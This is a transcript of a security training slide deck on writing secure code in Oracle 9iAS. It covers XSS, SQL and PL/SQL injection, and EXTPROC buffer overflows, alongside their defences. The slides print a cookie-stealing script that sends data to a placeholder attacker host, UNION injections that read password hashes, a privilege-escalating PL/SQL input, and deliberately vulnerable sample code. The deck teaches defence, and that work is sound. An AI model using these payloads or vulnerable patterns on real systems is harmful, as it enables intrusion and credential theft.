Presentation is loading. Please wait.

Presentation is loading. Please wait.

Hack-proofing Oracle 9iAS Writing Secure Code in Oracle Aaron Newman Application Security, Inc.

Published byCornelia Welch Modified over 9 years ago

Similar presentations

Presentation on theme: "Hack-proofing Oracle 9iAS Writing Secure Code in Oracle Aaron Newman Application Security, Inc."— Presentation transcript:

1 www.AppSecInc.com Hack-proofing Oracle 9iAS Writing Secure Code in Oracle Aaron Newman anewman@appsecinc.com Application Security, Inc. www.appsecinc.com Download updated version of presentation from http://www.appsecinc.com/news/briefing.html

2 www.AppSecInc.com Hack-proofing Oracle 9iAS Agenda Managing state –Query parameters/Hidden fields/Cookies Cross-site scripting SQL Injection PL/SQL Injection Buffer overflows in EXTPROC Resources, Conclusion, and Wrap Up

3 www.AppSecInc.com Hack-proofing Oracle 9iAS Managing State

4 www.AppSecInc.com Hack-proofing Oracle 9iAS Validating Input Must validate data from untrusted sources What’s an untrusted source? –Any data that is anonymous –Any data that can be spoofed How to validate data –Don’t match that is looks bad –Check that it looks good Failure to sanitize input –Root of most security problems

5 www.AppSecInc.com Hack-proofing Oracle 9iAS Trusting client-side code Controlling the client is impossible Even for applications behind a firewall Anyone can connect to the network –Through a wireless access point In any type of applications –Never trust client-side code –Assumed data passed to client will be manipulated –Security must be server-based

6 www.AppSecInc.com Hack-proofing Oracle 9iAS Maintaining State How to maintain state in web application –Never pass anything other than the session ID back to the client In Java, use the Session object HttpSession session=request.getSession(); Java uses a session ID stored in the cookie or URL Session ID is strong –Very random, not predictable, not brute force

7 www.AppSecInc.com Hack-proofing Oracle 9iAS The wrong way to maintain state Many people store data variables –In HIDDEN fields –In cookies –Or in the URL This is bad!!! –Very easy to change your ID to 6244 and now you can access someone else’s data

8 www.AppSecInc.com Hack-proofing Oracle 9iAS Session manipulation demo Oracle9iAS with a Java Servlet

9 www.AppSecInc.com Hack-proofing Oracle 9iAS Cross-site scripting

10 www.AppSecInc.com Hack-proofing Oracle 9iAS What is it? Also known as XSS or CSS Used to steal authentication credentials of other users Requires some social engineering Very common Not widely understood OpenHack – 4 th annual eWeek competition –CSS vulnerability in the Oracle application http://www.eweek.com/category2/1,3960,600431,00.asp

11 www.AppSecInc.com Hack-proofing Oracle 9iAS How does it occur? A website does not filter HTML tags when accepting user input Allows arbitrary HTML/script tags to be injected into a link or page Can embed Java scripts in links or in bulletin boards, etc… document.location=‘http://www.hacker.com/cgi- bin/cookie.cgi?’%20+document.cookie When the victim views this injected Java script, their cookie is sent to the attackers website

12 www.AppSecInc.com Hack-proofing Oracle 9iAS How can this be used? Post malicious Java Script to a bulletin or message board Ebay – attacker registers an item to sell and embeds malicious content in description Send an email with a malicious link http://host/a.cgi?variable= document.location=‘ht tp://www.hacker.com/cgi- bin/cookie.cgi?’%20+document.cookie –Hex encode the malicious link http://host/a.cgi?variable=%22%3E%3C…. –Occurs often with error messages

13 www.AppSecInc.com Hack-proofing Oracle 9iAS Real World Examples Ebay – attacker registers an item to sell and embeds malicious content in description Spoof email from CitiBank's online cash site, C2IT.com - click here for account info Send an email to support for an organization –When they view your message through a web application, you steal a privileged users cookie Insert data into the database –Wait for someone to view through web browser

14 www.AppSecInc.com Hack-proofing Oracle 9iAS Preventing Sanitize all characters –Filter metacharacters Replace with &gt Replace # with &#35 and & with &#38 Replace ( with &#40 and ) with &#41 Convert any text when save and reading

15 www.AppSecInc.com Hack-proofing Oracle 9iAS Executing injected code Can you cause Java or other languages to be executed in JSP/Java Servlets? –NEVER SAY NEVER! Also possible to inject SSI or other includes directives –Can include files such as /etc/passwd Send URL with Java code or include directive that gets written to log files –Executed when you view or viewed by admin

16 www.AppSecInc.com Hack-proofing Oracle 9iAS Cross-site scripting demo

17 www.AppSecInc.com Hack-proofing Oracle 9iAS SQL Injection

18 www.AppSecInc.com Hack-proofing Oracle 9iAS How does it work? Modify the query Change: Select * from my_table where column_x = ‘1’ To: Select * from my_table where column_x = ‘1’ UNION select password from DBA_USERS where ‘q’=‘q’

19 www.AppSecInc.com Hack-proofing Oracle 9iAS Example JSP page String sql = new String(“SELECT * FROM WebUsers WHERE Username=’” + request.getParameter(“username”) + “’ AND Password=’” + request.getParameter(“password”) + “’” stmt = Conn.prepareStatement(sql) Rs = stmt.executeQuery()

20 www.AppSecInc.com Hack-proofing Oracle 9iAS Valid Input If I set the username and password to: Username: Bob Password: Hardtoguesspassword The SQL statement is: SELECT * FROM WebUsers WHERE Username=’Bob’ AND Password=’Hardtoguess’

21 www.AppSecInc.com Hack-proofing Oracle 9iAS Hacker Input Instead enter the password: Aa’ OR ‘A’=‘A The SQL statement now becomes: SELECT * FROM WebUsers WHERE Username=’Bob’ AND Password=’Aa’ OR ‘A’=‘A’ The attacker is now in the database!

22 www.AppSecInc.com Hack-proofing Oracle 9iAS Selecting from other Tables To select data other than the rows from the table being selected from. UNION the SQL Statement with the DBA_USERS view.

23 www.AppSecInc.com Hack-proofing Oracle 9iAS Example JSP Page String sql = new String(“ SELECT * FROM PRODUCT WHERE ProductName=’ ” + request.getParameter(“product _name”) + “’” stmt = Conn.prepareStatement(sql) Rs = stmt.executeQuery()

24 www.AppSecInc.com Hack-proofing Oracle 9iAS Valid Input Set the product_name to : DVD Player The SQL Statement is now: SELECT * FROM PRODUCT WHERE ProductName=’DVD Player’

25 www.AppSecInc.com Hack-proofing Oracle 9iAS Hacker Input Set the product_name to : test’ UNION select username, password from dba_users where ‘a’ = ‘a The SQL Statement is now: SELECT * FROM PRODUCT WHERE ProductName=’test’ UNION select username, password from dba_users where ‘a’=‘a’

26 www.AppSecInc.com Hack-proofing Oracle 9iAS Preventing SQL Injection Validate user input –Parse field to escape single quotes to double quotes Use the object parameters to set parameters –Bind variables

27 www.AppSecInc.com Hack-proofing Oracle 9iAS SQL Injection demo JSP page, Oracle HTTP Server, Jserv, Oracle database

28 www.AppSecInc.com Hack-proofing Oracle 9iAS Where can this occur We have seen a demo of this in a Java Server Pages What about other places –Java Servlets –Java Stored Procedures –Web services Fundamentally the same problem –All these other technologies have the same issues

29 www.AppSecInc.com Hack-proofing Oracle 9iAS Java Stored Procedures Java methods published to SQL Allow Java to be called inside the database Run under security context of the owner Uses “default” connect to the database // Get a Default Database Connection using Server Side JDBC Driver. // Note : This class will be loaded on the Database Server and hence use a // Server Side JDBC Driver to get default Connection to Database db=new OracleDriver().defaultConnection();

30 www.AppSecInc.com Hack-proofing Oracle 9iAS Examples First example JSP from Oracle’s website –http://technet.oracle.com/sample_code/tech/java/jsp/sampl es/plsqlcallingjsp/BestHotelsPLSQLProcedure.java.html package oracle.otnsamples.jsp.besthotelsplsqlsam; public static void getRoomDetails(String hotelId, String roomType, int[] numRoomsAvailable, float[] standardRoomRate) { stmt = connection.prepareStatement("SELECT TOTAL_"+ roomType + " FROM ROOM_AVAILABILITY WHERE HOT_ID = TO_NUMBER(?) AND " + " BOOKING_DATE = ( SELECT MAX(BOOKING_DATE) FROM ROOM_AVAILABILITY " + " WHERE HOT_ID = TO_NUMBER(?) )" );

31 www.AppSecInc.com Hack-proofing Oracle 9iAS Hacker Input Set the roomType to : ORCL FROM ROOM_AVAILABILITY WHERE ‘1’=‘2’ UNION SELECT PASSWORD FROM DBA_USERS WHERE USER_NAME=‘SYSTEM’ UNION SELECT TOTAL_ORCL The SQL is now: SELECT TOTAL_ORCL FROM ROOM_AVAILABILITY WHERE ‘1’=‘2’ UNION SELECT PASSWORD FROM DBA_USERS WHERE USER_NAME = ‘SYSTEM’ UNION SELECT TOTAL_ORCL FROM ROOM_AVAILABILITY WHERE HOT_ID = TO_NUMBER(?) AND BOOKING_DATE = ( SELECT MAX(BOOKING_DATE) FROM ROOM_AVAILABILITY WHERE HOT_ID = TO_NUMBER(?) ) Returns the password hash for the SYSTEM user

32 www.AppSecInc.com Hack-proofing Oracle 9iAS Web services Use Java code as services Export functions as SOAP calls Don’t accidentally expose SOAP functions that should only be used internally –Increases the likelihood of buffer overflow, SQL Injection Accepts calls in XML Envelopes

33 www.AppSecInc.com Hack-proofing Oracle 9iAS Example SOAP call ORCL

34 www.AppSecInc.com Hack-proofing Oracle 9iAS Attacking a web services ORCL FROM ROOM_AVAILABILITY WHERE ‘1’=‘2’ UNION SELECT PASSWORD FROM DBA_USERS

35 www.AppSecInc.com Hack-proofing Oracle 9iAS PL/SQL Injection

36 www.AppSecInc.com Hack-proofing Oracle 9iAS PL/SQL Vulnerabilities Problem with dynamic SQL –EXECUTE IMMEDIATE –DBMS_SQL Danger allowing the user to pass parameters that are used in the parsed SQL statement

37 www.AppSecInc.com Hack-proofing Oracle 9iAS Dynamic SQL Example CREATE PROCEDURE BAD_CODING_EXAMPLE ( NEW_PASSWORD VARCHAR2 ) AS TEST VARCHAR2; BEGIN -- DO SOME WORK HERE EXECUTE IMMEDIATE 'UPDATE ' || TABLE_NAME || ' SET ' || COLUMN_NAME || ' = ''' || NEW_PASSWORD || '''‘ WHERE USERNAME= = ''' || CURRENT_USER_NAME || '''; END BAD_CODING_EXAMPLE;

38 www.AppSecInc.com Hack-proofing Oracle 9iAS Input –EXEC BAD_CODING_EXAMPLE ( ‘testabc’ ); SQL Created –UPDATE APPLICATION_USERS SET PASSWORD = ‘testabc’ WHERE USERNAME = ‘aaron’ Valid input

39 www.AppSecInc.com Hack-proofing Oracle 9iAS Input –EXEC BAD_CODING_EXAMPLE (‘testabc’’, ADMIN=1,FULL_NAME=‘’TEST’ ); SQL Created –UPDATE APPLICATION_USERS SET PASSWORD = ‘testabc‘, ADMIN=1, FULL_NAME=‘TEST’ WHERE USERNAME = ‘aaron’ Hacker input

40 www.AppSecInc.com Hack-proofing Oracle 9iAS PL/SQL Injection demo SYS.INITJVMAUX package

41 www.AppSecInc.com Hack-proofing Oracle 9iAS Buffer overflows in EXTPROC

42 www.AppSecInc.com Hack-proofing Oracle 9iAS What is a buffer overflow When a program attempts to write more data into buffer than that buffer can hold… …Starts overwriting area of stack memory That can be used maliciously to cause a program to execute code of attackers choose Overwrites stack point

43 www.AppSecInc.com Hack-proofing Oracle 9iAS Mechanics of stack-based buffer overflow Stack is like a pile of plates When a function is called, the return address is pushed on the stack In a function, local variables are written on the stack Memory is written on stack –char username[4] reserved 4 bytes of space on stack 0X0684 0X0685 0X0686 0X0687 0X0688 0X0689 0X0690 0X0691 0X0692 local stack memory return function y s s 0X0123 \0

44 www.AppSecInc.com Hack-proofing Oracle 9iAS Mechanics of stack-based buffer overflow When function copies too much on the stack The return pointer is overwritten Execution path of function changed when function ends Local stack memory has malicious code 0X0684 0X0685 0X0686 0X0687 0X0688 0X0689 0X0690 0X0691 0X0692 local stack memory return function 0X01230X0689 X X X X

45 www.AppSecInc.com Hack-proofing Oracle 9iAS External Procedures Functions in DLL and shared libraries Can be called from PL/SQL Setup by creating libraries and packages: –CREATE LIBRARY test AS ‘msvcrt.dll’; CREATE PACKAGE test_function IS PROCEDURE exec(command IN CHAR); CREATE PACKAGE BODY test_function IS PROCEDURE exec(command IN CHAR) IS EXTERNAL NAME “system” LIBRARY test;

46 www.AppSecInc.com Hack-proofing Oracle 9iAS Writing an External Procedure Common to written in C or C++ Example buffer overflow: void EmpExp(hiredate, hiredate_len) char *hiredate; int hiredate_len; { char hire_date_temp[100]; strcpy( hire_date_temp, hiredate ); Send in hiredate 200 bytes long

47 www.AppSecInc.com Hack-proofing Oracle 9iAS Preventing a buffer overflow Defensive coding: void EmpExp(hiredate, hiredate_len) char *hiredate; int hiredate_len; { char hire_date_temp[100]; strncpy( hire_date_temp, hiredate, 99); Send in hiredate 200 bytes long –stack does not get over written

48 www.AppSecInc.com Hack-proofing Oracle 9iAS Resources, Conclusion, and Wrap Up

49 www.AppSecInc.com Hack-proofing Oracle 9iAS How to Combat Hackers Oracle security white papers: –www.appsecinc.com/techdocs/whitepapers.html Security Discussion Board –www.appsecinc.com/cgi-bin/ubb/ultimatebb.cgi Check out security solutions at: –www.appsecinc.com/products Run audits/pen test on your application logic

50 www.AppSecInc.com Hack-proofing Oracle 9iAS Storing authentication credentials Gaining access to source code is very common Never store password credentials in source code Store somewhere securely –Load in the source code The registry is convenient –Not 100% secure but better than storing in code

51 www.AppSecInc.com Hack-proofing Oracle 9iAS Questions? About –Writing secure code –Protecting your applications Download free evaluation software at: –www.appsecinc.com Email me at: anewman@appsecinc.com www.appsecinc.com

Download ppt "Hack-proofing Oracle 9iAS Writing Secure Code in Oracle Aaron Newman Application Security, Inc."

Similar presentations

Module XIV SQL Injection

Module XIV SQL Injection
Cross-Site Scripting Issues and Defenses Ed Skoudis Predictive Systems © 2002, Predictive Systems.

Cross-Site Scripting Issues and Defenses Ed Skoudis Predictive Systems © 2002, Predictive Systems.
Web Security Never, ever, trust user inputs Supankar.

Web Security Never, ever, trust user inputs Supankar.
©2009 Justin C. Klein Keane PHP Code Auditing Session 5 XSS & XSRF Justin C. Klein Keane

©2009 Justin C. Klein Keane PHP Code Auditing Session 5 XSS & XSRF Justin C. Klein Keane
Copyright © 2004 - The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the GNU Free Documentation.

Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the GNU Free Documentation.
WebGoat & WebScarab “What is computer security for $1000 Alex?”

WebGoat & WebScarab “What is computer security for $1000 Alex?”
9/9/2005 Developing Secure Web Applications 1 Methods & Concepts for Developing “Secure” Web Applications Peter Y. Hammond, Developer Wasatch Front Regional.

9/9/2005 Developing "Secure" Web Applications 1 Methods & Concepts for Developing “Secure” Web Applications Peter Y. Hammond, Developer Wasatch Front Regional.
By Brian Vees.  SQL Injection  Username Enumeration  Cross Site Scripting (XSS)  Remote Code Execution  String Formatting Vulnerabilities.

By Brian Vees.  SQL Injection  Username Enumeration  Cross Site Scripting (XSS)  Remote Code Execution  String Formatting Vulnerabilities.
Chapter 9 Web Applications. Web Applications are public and available to the entire world. Easy access to the application means also easy access for malicious.

Chapter 9 Web Applications. Web Applications are public and available to the entire world. Easy access to the application means also easy access for malicious.
Information Networking Security and Assurance Lab National Chung Cheng University The Ten Most Critical Web Application Security Vulnerabilities Ryan J.W.

Information Networking Security and Assurance Lab National Chung Cheng University The Ten Most Critical Web Application Security Vulnerabilities Ryan J.W.
Input Validation For Free Text Fields Project Members: Hagar Offer &Ran Mor Academic Advisor: Dr Gera Weiss Technical Advisors: Raffi Lipkin & Nadav Attias.

Input Validation For Free Text Fields Project Members: Hagar Offer &Ran Mor Academic Advisor: Dr Gera Weiss Technical Advisors: Raffi Lipkin & Nadav Attias.
SQL Injection and Buffer overflow

SQL Injection and Buffer overflow
Lecture 16 Page 1 CS 236 Online Cross-Site Scripting XSS Many sites allow users to upload information –Blogs, photo sharing, Facebook, etc. –Which gets.

Lecture 16 Page 1 CS 236 Online Cross-Site Scripting XSS Many sites allow users to upload information –Blogs, photo sharing, Facebook, etc. –Which gets.
Handling Security Threats in Kentico CMS Karol Jarkovsky Sr. Solution Architect Kentico Software

Handling Security Threats in Kentico CMS Karol Jarkovsky Sr. Solution Architect Kentico Software
Web Application Attacks ECE 4112 Fall 2007 Group 9 Zafeer Khan & Simmon Yau.

Web Application Attacks ECE 4112 Fall 2007 Group 9 Zafeer Khan & Simmon Yau.
Web Application Vulnerabilities Checklist. EC-Council Parameter Checklist  URL request  URL encoding  Query string  Header  Cookie  Form field 

Web Application Vulnerabilities Checklist. EC-Council Parameter Checklist  URL request  URL encoding  Query string  Header  Cookie  Form field 
Form Handling, Validation and Functions. Form Handling Forms are a graphical user interfaces (GUIs) that enables the interaction between users and servers.

Form Handling, Validation and Functions. Form Handling Forms are a graphical user interfaces (GUIs) that enables the interaction between users and servers.
1 IS 2150 / TEL 2810 Introduction to Security James Joshi Associate Professor, SIS Lecture 12.1 Nov 20, 2012 SQL Injection Cross-Site Scripting.

1 IS 2150 / TEL 2810 Introduction to Security James Joshi Associate Professor, SIS Lecture 12.1 Nov 20, 2012 SQL Injection Cross-Site Scripting.
PHP Security.

PHP Security.
Security Exploiting Overflows. Introduction r See the following link for more info: operating-systems-and-applications-in-

Security Exploiting Overflows. Introduction r See the following link for more info: operating-systems-and-applications-in-

Similar presentations

Ads by Google